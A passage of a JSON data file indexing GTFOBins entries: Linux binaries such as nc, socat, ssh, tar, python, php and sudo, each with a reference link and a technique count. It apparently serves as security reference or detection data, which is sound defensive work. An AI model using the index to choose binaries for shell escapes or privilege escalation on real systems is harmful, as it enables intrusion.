o:logsave","name":"logsave","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/logsave/"],"count":3},{"id":"gtfo:look","name":"look","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/look/"],"count":3},{"id":"gtfo:lp","name":"lp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lp/"],"count":3},{"id":"gtfo:ltrace","name":"ltrace","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ltrace/"],"count":7},{"id":"gtfo:lua","name":"lua","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lua/"],"count":21},{"id":"gtfo:lualatex","name":"lualatex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lualatex/"],"count":3},{"id":"gtfo:luatex","name":"luatex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/luatex/"],"count":3},{"id":"gtfo:lwp-download","name":"lwp-download","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lwp-download/"],"count":8},{"id":"gtfo:lwp-request","name":"lwp-request","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lwp-request/"],"count":2},{"id":"gtfo:lxd","name":"lxd","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lxd/"],"count":4},{"id":"gtfo:m4","name":"m4","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/m4/"],"count":9},{"id":"gtfo:mail","name":"mail","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mail/"],"count":6},{"id":"gtfo:make","name":"make","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/make/"],"count":9},{"id":"gtfo:man","name":"man","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/man/"],"count":9},{"id":"gtfo:mawk","name":"mawk","source":"GTFOBins","platform":["Linux"],"aliases":["awk"],"references":["https://gtfobins.github.io/gtfobins/mawk/"],"count":9},{"id":"gtfo:minicom","name":"minicom","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/minicom/"],"count":6},{"id":"gtfo:more","name":"more","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/more/"],"count":6},{"id":"gtfo:mosh-server","name":"mosh-server","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mosh-server/"],"count":1},{"id":"gtfo:mosquitto","name":"mosquitto","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mosquitto/"],"count":3},{"id":"gtfo:mount","name":"mount","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mount/"],"count":1},{"id":"gtfo:msfconsole","name":"msfconsole","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msfconsole/"],"count":2},{"id":"gtfo:msgattrib","name":"msgattrib","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msgattrib/"],"count":3},{"id":"gtfo:msgcat","name":"msgcat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msgcat/"],"count":3},{"id":"gtfo:msgconv","name":"msgconv","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msgconv/"],"count":3},{"id":"gtfo:msgfilter","name":"msgfilter","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msgfilter/"],"count":6},{"id":"gtfo:msgmerge","name":"msgmerge","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msgmerge/"],"count":3},{"id":"gtfo:msguniq","name":"msguniq","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msguniq/"],"count":3},{"id":"gtfo:mtr","name":"mtr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mtr/"],"count":2},{"id":"gtfo:multitime","name":"multitime","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/multitime/"],"count":3},{"id":"gtfo:mutt","name":"mutt","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mutt/"],"count":2},{"id":"gtfo:mv","name":"mv","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mv/"],"count":5},{"id":"gtfo:mypy","name":"mypy","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mypy/"],"count":4},{"id":"gtfo:mysql","name":"mysql","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mysql/"],"count":6},{"id":"gtfo:nano","name":"nano","source":"GTFOBins","platform":["Linux"],"aliases":["pico"],"references":["https://gtfobins.github.io/gtfobins/nano/"],"count":12},{"id":"gtfo:nasm","name":"nasm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nasm/"],"count":3},{"id":"gtfo:nc","name":"nc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nc/"],"count":18},{"id":"gtfo:ncdu","name":"ncdu","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ncdu/"],"count":3},{"id":"gtfo:ncftp","name":"ncftp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ncftp/"],"count":3},{"id":"gtfo:needrestart","name":"needrestart","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/needrestart/"],"count":2},{"id":"gtfo:neofetch","name":"neofetch","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/neofetch/"],"count":4},{"id":"gtfo:nft","name":"nft","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nft/"],"count":2},{"id":"gtfo:nginx","name":"nginx","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nginx/"],"count":5},{"id":"gtfo:nice","name":"nice","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nice/"],"count":3},{"id":"gtfo:nl","name":"nl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nl/"],"count":3},{"id":"gtfo:nm","name":"nm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nm/"],"count":3},{"id":"gtfo:nmap","name":"nmap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nmap/"],"count":12},{"id":"gtfo:node","name":"node","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/node/"],"count":22},{"id":"gtfo:nohup","name":"nohup","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nohup/"],"count":6},{"id":"gtfo:npm","name":"npm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/npm/"],"count":6},{"id":"gtfo:nroff","name":"nroff","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nroff/"],"count":4},{"id":"gtfo:nsenter","name":"nsenter","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nsenter/"],"count":3},{"id":"gtfo:ntpdate","name":"ntpdate","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ntpdate/"],"count":3},{"id":"gtfo:octave","name":"octave","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/octave/"],"count":9},{"id":"gtfo:od","name":"od","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/od/"],"count":3},{"id":"gtfo:opencode","name":"opencode","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/opencode/"],"count":5},{"id":"gtfo:openssl","name":"openssl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/openssl/"],"count":21},{"id":"gtfo:openvpn","name":"openvpn","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/openvpn/"],"count":6},{"id":"gtfo:openvt","name":"openvt","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/openvt/"],"count":1},{"id":"gtfo:opkg","name":"opkg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/opkg/"],"count":1},{"id":"gtfo:pandoc","name":"pandoc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pandoc/"],"count":9},{"id":"gtfo:passwd","name":"passwd","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/passwd/"],"count":1},{"id":"gtfo:paste","name":"paste","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/paste/"],"count":3},{"id":"gtfo:pax","name":"pax","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pax/"],"count":3},{"id":"gtfo:pdb","name":"pdb","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pdb/"],"count":2},{"id":"gtfo:pdflatex","name":"pdflatex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"count":9},{"id":"gtfo:pdftex","name":"pdftex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pdftex/"],"count":3},{"id":"gtfo:perf","name":"perf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/perf/"],"count":3},{"id":"gtfo:perl","name":"perl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/perl/"],"count":14},{"id":"gtfo:perlbug","name":"perlbug","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/perlbug/"],"count":2},{"id":"gtfo:pexec","name":"pexec","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pexec/"],"count":3},{"id":"gtfo:pg","name":"pg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pg/"],"count":6},{"id":"gtfo:php","name":"php","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/php/"],"count":40},{"id":"gtfo:pic","name":"pic","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pic/"],"count":6},{"id":"gtfo:pidstat","name":"pidstat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pidstat/"],"count":3},{"id":"gtfo:pip","name":"pip","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pip/"],"count":4},{"id":"gtfo:pipx","name":"pipx","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pipx/"],"count":2},{"id":"gtfo:pkexec","name":"pkexec","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pkexec/"],"count":1},{"id":"gtfo:pkg","name":"pkg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pkg/"],"count":1},{"id":"gtfo:plymouth","name":"plymouth","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/plymouth/"],"count":3},{"id":"gtfo:podman","name":"podman","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/podman/"],"count":2},{"id":"gtfo:poetry","name":"poetry","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/poetry/"],"count":2},{"id":"gtfo:posh","name":"posh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/posh/"],"count":2},{"id":"gtfo:pr","name":"pr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pr/"],"count":3},{"id":"gtfo:procmail","name":"procmail","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/procmail/"],"count":2},{"id":"gtfo:pry","name":"pry","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pry/"],"count":2},{"id":"gtfo:psftp","name":"psftp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/psftp/"],"count":3},{"id":"gtfo:psql","name":"psql","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/psql/"],"count":6},{"id":"gtfo:ptx","name":"ptx","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ptx/"],"count":3},{"id":"gtfo:puppet","name":"puppet","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/puppet/"],"count":6},{"id":"gtfo:pwsh","name":"pwsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pwsh/"],"count":4},{"id":"gtfo:pygmentize","name":"pygmentize","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pygmentize/"],"count":2},{"id":"gtfo:pyright","name":"pyright","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pyright/"],"count":6},{"id":"gtfo:python","name":"python","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/python/"],"count":26},{"id":"gtfo:qpdf","name":"qpdf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/qpdf/"],"count":3},{"id":"gtfo:rake","name":"rake","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rake/"],"count":4},{"id":"gtfo:ranger","name":"ranger","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ranger/"],"count":2},{"id":"gtfo:rc","name":"rc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rc/"],"count":3},{"id":"gtfo:readelf","name":"readelf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/readelf/"],"count":3},{"id":"gtfo:redcarpet","name":"redcarpet","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/redcarpet/"],"count":2},{"id":"gtfo:redis","name":"redis","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/redis/"],"count":3},{"id":"gtfo:restic","name":"restic","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/restic/"],"count":15},{"id":"gtfo:rev","name":"rev","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rev/"],"count":3},{"id":"gtfo:rlogin","name":"rlogin","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rlogin/"],"count":3},{"id":"gtfo:rlwrap","name":"rlwrap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rlwrap/"],"count":6},{"id":"gtfo:rpm","name":"rpm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rpm/"],"count":10},{"id":"gtfo:rpmdb","name":"rpmdb","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rpmdb/"],"count":6},{"id":"gtfo:rpmquery","name":"rpmquery","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rpmquery/"],"count":6},{"id":"gtfo:rpmverify","name":"rpmverify","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rpmverify/"],"count":6},{"id":"gtfo:rsync","name":"rsync","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rsync/"],"count":3},{"id":"gtfo:rsyslogd","name":"rsyslogd","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rsyslogd/"],"count":1},{"id":"gtfo:rtorrent","name":"rtorrent","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rtorrent/"],"count":3},{"id":"gtfo:ruby","name":"ruby","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ruby/"],"count":15},{"id":"gtfo:run-mailcap","name":"run-mailcap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/run-mailcap/"],"count":4},{"id":"gtfo:run-parts","name":"run-parts","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/run-parts/"],"count":6},{"id":"gtfo:runscript","name":"runscript","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/runscript/"],"count":3},{"id":"gtfo:rustc","name":"rustc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rustc/"],"count":6},{"id":"gtfo:rustdoc","name":"rustdoc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rustdoc/"],"count":4},{"id":"gtfo:rustfmt","name":"rustfmt","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rustfmt/"],"count":2},{"id":"gtfo:rustup","name":"rustup","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rustup/"],"count":4},{"id":"gtfo:sash","name":"sash","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sash/"],"count":3},{"id":"gtfo:scanmem","name":"scanmem","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/scanmem/"],"count":3},{"id":"gtfo:scp","name":"scp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/scp/"],"count":12},{"id":"gtfo:screen","name":"screen","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/screen/"],"count":6},{"id":"gtfo:script","name":"script","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/script/"],"count":6},{"id":"gtfo:scrot","name":"scrot","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/scrot/"],"count":3},{"id":"gtfo:sed","name":"sed","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sed/"],"count":12},{"id":"gtfo:service","name":"service","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/service/"],"count":2},{"id":"gtfo:setarch","name":"setarch","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/setarch/"],"count":3},{"id":"gtfo:setcap","name":"setcap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/setcap/"],"count":2},{"id":"gtfo:setfacl","name":"setfacl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/setfacl/"],"count":2},{"id":"gtfo:setlock","name":"setlock","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/setlock/"],"count":3},{"id":"gtfo:sftp","name":"sftp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sftp/"],"count":9},{"id":"gtfo:sg","name":"sg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sg/"],"count":2},{"id":"gtfo:shred","name":"shred","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/shred/"],"count":3},{"id":"gtfo:shuf","name":"shuf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/shuf/"],"count":6},{"id":"gtfo:slsh","name":"slsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/slsh/"],"count":3},{"id":"gtfo:smbclient","name":"smbclient","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/smbclient/"],"count":6},{"id":"gtfo:snap","name":"snap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/snap/"],"count":1},{"id":"gtfo:socat","name":"socat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/socat/"],"count":21},{"id":"gtfo:socket","name":"socket","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/socket/"],"count":6},{"id":"gtfo:soelim","name":"soelim","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/soelim/"],"count":3},{"id":"gtfo:softlimit","name":"softlimit","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/softlimit/"],"count":3},{"id":"gtfo:sort","name":"sort","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sort/"],"count":6},{"id":"gtfo:split","name":"split","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/split/"],"count":9},{"id":"gtfo:sqlite3","name":"sqlite3","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sqlite3/"],"count":9},{"id":"gtfo:sqlmap","name":"sqlmap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sqlmap/"],"count":2},{"id":"gtfo:ss","name":"ss","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ss/"],"count":3},{"id":"gtfo:ssh","name":"ssh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ssh/"],"count":16},{"id":"gtfo:ssh-agent","name":"ssh-agent","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ssh-agent/"],"count":3},{"id":"gtfo:ssh-copy-id","name":"ssh-copy-id","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ssh-copy-id/"],"count":4},{"id":"gtfo:ssh-keygen","name":"ssh-keygen","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ssh-keygen/"],"count":3},{"id":"gtfo:ssh-keyscan","name":"ssh-keyscan","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ssh-keyscan/"],"count":3},{"id":"gtfo:sshfs","name":"sshfs","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sshfs/"],"count":6},{"id":"gtfo:sshpass","name":"sshpass","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sshpass/"],"count":3},{"id":"gtfo:sshuttle","name":"sshuttle","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sshuttle/"],"count":1},{"id":"gtfo:start-stop-daemon","name":"start-stop-daemon","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/start-stop-daemon/"],"count":3},{"id":"gtfo:stdbuf","name":"stdbuf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/stdbuf/"],"count":3},{"id":"gtfo:strace","name":"strace","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/strace/"],"count":5},{"id":"gtfo:strings","name":"strings","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/strings/"],"count":3},{"id":"gtfo:su","name":"su","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/su/"],"count":1},{"id":"gtfo:sudo","name":"sudo","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sudo/"],"count":1},{"id":"gtfo:sysctl","name":"sysctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/sysctl/"],"count":5},{"id":"gtfo:systemctl","name":"systemctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/systemctl/"],"count":6},{"id":"gtfo:systemd-resolve","name":"systemd-resolve","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/systemd-resolve/"],"count":1},{"id":"gtfo:systemd-run","name":"systemd-run","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/systemd-run/"],"count":3},{"id":"gtfo:tac","name":"tac","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tac/"],"count":3},{"id":"gtfo:tail","name":"tail","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tail/"],"count":3},{"id":"gtfo:tailscale","name":"tailscale","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tailscale/"],"count":1},{"id":"gtfo:tar","name":"tar","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tar/"],"count":21},{"id":"gtfo:task","name":"task","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/task/"],"count":3},{"id":"gtfo:taskset","name":"taskset","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/taskset/"],"count":2},{"id":"gtfo:tasksh","name":"tasksh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tasksh/"],"count":3},{"id":"gtfo:tbl","name":"tbl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tbl/"],"count":3},{"id":"gtfo:tclsh","name":"tclsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tclsh/"],"count":10},{"id":"gtfo:tcpdump","name":"tcpdump","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tcpdump/"],"count":7},{"id":"gtfo:tcsh","name":"tcsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tcsh/"],"count":6},{"id":"gtfo:tdbtool","name":"tdbtool","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tdbtool/"],"count":3},{"id":"gtfo:tee","name":"tee","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tee/"],"count":3},{"id":"gtfo:telnet","name":"telnet","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/telnet/"],"count":6},{"id":"gtfo:terraform","name":"terraform","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/terraform/"],"count":3},{"id":"gtfo:tex","name":"tex","source":"GTFOBins","platform":["Linux"],"aliases":["xetex"],"references":["https://gtfobins.github.io/gtfobins/tex/"],"count":3},{"id":"gtfo:tftp","name":"tftp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tftp/"],"count":6},{"id":"gtfo:tic","name":"tic","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tic/"],"count":3},{"id":"gtfo:time","name":"time","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/time/"],"count":3},{"id":"gtfo:timedatectl","name":"timedatectl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/timedatectl/"],"count":2},{"id":"gtfo:timeout","name":"timeout","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/timeout/"],